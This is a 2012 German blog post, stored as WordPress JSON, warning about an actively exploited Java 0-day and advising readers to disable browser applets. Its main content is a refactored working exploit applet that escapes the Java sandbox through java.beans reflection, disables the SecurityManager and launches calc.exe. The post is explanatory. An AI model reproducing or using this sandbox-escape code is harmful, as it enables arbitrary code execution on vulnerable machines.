{"id":1543,"date":"2012-08-29T09:35:55","date_gmt":"2012-08-29T07:35:55","guid":{"rendered":"http:\/\/www.tutego.de\/blog\/javainsel\/?p=1543"},"modified":"2012-08-29T11:11:54","modified_gmt":"2012-08-29T09:11:54","slug":"achtung-java-0-day-exploit-es-ist-ernst","status":"publish","type":"post","link":"https:\/\/www.tutego.de\/blog\/javainsel\/2012\/08\/achtung-java-0-day-exploit-es-ist-ernst\/","title":{"rendered":"Achtung: Java 0-day Exploit, es ist ERNST"},"content":{"rendered":"<p>Auf meiner Google+ Seite hatte ich das schon kurz angesprochen: Es gibt eine Sicherheitsl\u00fccke, die bisher auch schon ausgenutzt wird. Das ist ein ernstes Problem und jeder ist angehalten, Applets im Browser abzuknipsen. Da die meisten von uns vermutlich eh keine Applets ben\u00f6tigen, ist es sinnvoll, das ganz komplett f\u00fcr immer abzuschalten bzw. nur Ausnahmen zu erteilen (Chrome, siehe <a href=\"https:\/\/support.google.com\/chrome\/bin\/answer.py?hl=de&amp;answer=142064\">https:\/\/support.google.com\/chrome\/bin\/answer.py?hl=de&amp;answer=142064<\/a>). Mehr News unter<\/p>\n<ul>\n<li><a href=\"http:\/\/www.heise.de\/security\/artikel\/Java-0-Day-unter-der-Lupe-1676764.html\">http:\/\/www.heise.de\/security\/artikel\/Java-0-Day-unter-der-Lupe-1676764.html<\/a> <\/li>\n<li><a href=\"http:\/\/www.heise.de\/newsticker\/meldung\/BSI-warnt-vor-hochkritischer-Java-Luecke-1677249.html\">http:\/\/www.heise.de\/newsticker\/meldung\/BSI-warnt-vor-hochkritischer-Java-Luecke-1677249.html<\/a> <\/li>\n<li><a href=\"http:\/\/blog.fireeye.com\/research\/2012\/08\/zero-day-season-is-not-over-yet.html\">http:\/\/blog.fireeye.com\/research\/2012\/08\/zero-day-season-is-not-over-yet.html<\/a> <\/li>\n<li><a href=\"http:\/\/blog.fireeye.com\/research\/2012\/08\/java-zero-day-first-outbreak.html\">http:\/\/blog.fireeye.com\/research\/2012\/08\/java-zero-day-first-outbreak.html<\/a> <\/li>\n<\/ul>\n<p>Auf Basis des Exploits <a href=\"http:\/\/pastie.org\/4594319\">ttp:\/\/pastie.org\/4594319<\/a> habe ich das Programm etwas umformuliert (refactored) und kompakter gestaltet, sodass es leichter ist, die Herangehensweise zu verstehen und nachzuvollziehen:<\/p>\n<pre class=\"csharpcode\">package cve2012xxxx;\n\nimport java.applet.Applet;\nimport java.awt.Graphics;\nimport java.beans.Expression;\nimport java.beans.Statement;\nimport java.lang.reflect.Field;\nimport java.net.*;\nimport java.security.*;\nimport java.security.cert.Certificate;\n\n<span class=\"kwrd\">public<\/span> <span class=\"kwrd\">class<\/span> Gondvv extends Applet\n{\n  <span class=\"kwrd\">private<\/span> <span class=\"kwrd\">static<\/span> final <span class=\"kwrd\">long<\/span> serialVersionUID = 1L;\n\n  <span class=\"kwrd\">private<\/span> <span class=\"kwrd\">void<\/span> disableSecurity() throws Exception\n  {\n    Permissions localPermissions = <span class=\"kwrd\">new<\/span> Permissions();\n    localPermissions.add( <span class=\"kwrd\">new<\/span> AllPermission() );\n    CodeSource codeSource = <span class=\"kwrd\">new<\/span> CodeSource( <span class=\"kwrd\">new<\/span> URL( <span class=\"str\">&quot;file:\/\/\/&quot;<\/span> ), <span class=\"kwrd\">new<\/span> Certificate[]{} );\n    ProtectionDomain[] protectionDomains = { <span class=\"kwrd\">new<\/span> ProtectionDomain( codeSource, localPermissions ) };\n    AccessControlContext localAccessControlContext = <span class=\"kwrd\">new<\/span> AccessControlContext( protectionDomains );\n    Expression expr1 = <span class=\"kwrd\">new<\/span> Expression( Class.<span class=\"kwrd\">class<\/span>, <span class=\"str\">&quot;forName&quot;<\/span>, <span class=\"kwrd\">new<\/span> Object[]{ <span class=\"str\">&quot;sun.awt.SunToolkit&quot;<\/span> } );\n    expr1.execute();\n    Expression expr2 = <span class=\"kwrd\">new<\/span> Expression( expr1.getValue(), <span class=\"str\">&quot;getField&quot;<\/span>, <span class=\"kwrd\">new<\/span> Object[]{ Statement.<span class=\"kwrd\">class<\/span>, <span class=\"str\">&quot;acc&quot;<\/span> } );\n    expr2.execute();\n    Statement localStatement = <span class=\"kwrd\">new<\/span> Statement( System.<span class=\"kwrd\">class<\/span>, <span class=\"str\">&quot;setSecurityManager&quot;<\/span>, <span class=\"kwrd\">new<\/span> Object[1] );\n    ((Field) expr2.getValue()).set( localStatement, localAccessControlContext );\n    localStatement.execute();\n  }\n\n  @Override\n  <span class=\"kwrd\">public<\/span> <span class=\"kwrd\">void<\/span> init()\n  {\n    <span class=\"kwrd\">try<\/span> {\n      disableSecurity();\n      Runtime.getRuntime().exec( <span class=\"str\">&quot;calc.exe&quot;<\/span> ).waitFor();\n    }\n    <span class=\"kwrd\">catch<\/span> ( Throwable t ) {\n      t.printStackTrace();\n    }\n  }\n\n  @Override\n  <span class=\"kwrd\">public<\/span> <span class=\"kwrd\">void<\/span> paint( Graphics g )\n  {\n    g.drawString( <span class=\"str\">&quot;Loading&quot;<\/span>, 50, 25 );\n  }\n}<\/pre>\n<style type=\"text\/css\">\n<p>.csharpcode, .csharpcode pre\n{\n\tfont-size: small;\n\tcolor: black;\n\tfont-family: consolas, \"Courier New\", courier, monospace;\n\tbackground-color: #ffffff;\n\t\/*white-space: pre;*\/\n}\n.csharpcode pre { margin: 0em; }\n.csharpcode .rem { color: #008000; }\n.csharpcode .kwrd { color: #0000ff; }\n.csharpcode .str { color: #006080; }\n.csharpcode .op { color: #0000c0; }\n.csharpcode .preproc { color: #cc6633; }\n.csharpcode .asp { background-color: #ffff00; }\n.csharpcode .html { color: #800000; }\n.csharpcode .attr { color: #ff0000; }\n.csharpcode .alt \n{\n\tbackground-color: #f4f4f4;\n\twidth: 100%;\n\tmargin: 0em;\n}\n.csharpcode .lnum { color: #606060; }<\/style>\n","protected":false},"excerpt":{"rendered":"<p>Auf meiner Google+ Seite hatte ich das schon kurz angesprochen: Es gibt eine Sicherheitsl\u00fccke, die bisher auch schon ausgenutzt wird. Das ist ein ernstes Problem und jeder ist angehalten, Applets im Browser abzuknipsen. Da die meisten von uns vermutlich eh keine Applets ben\u00f6tigen, ist es sinnvoll, das ganz komplett f\u00fcr immer abzuschalten bzw. nur Ausnahmen [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":"","_links_to":"","_links_to_target":""},"categories":[1],"tags":[],"class_list":["post-1543","post","type-post","status-publish","format-standard","hentry","category-allgemein"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts\/1543","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/comments?post=1543"}],"version-history":[{"count":5,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts\/1543\/revisions"}],"predecessor-version":[{"id":1548,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts\/1543\/revisions\/1548"}],"wp:attachment":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/media?parent=1543"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/categories?post=1543"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/tags?post=1543"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}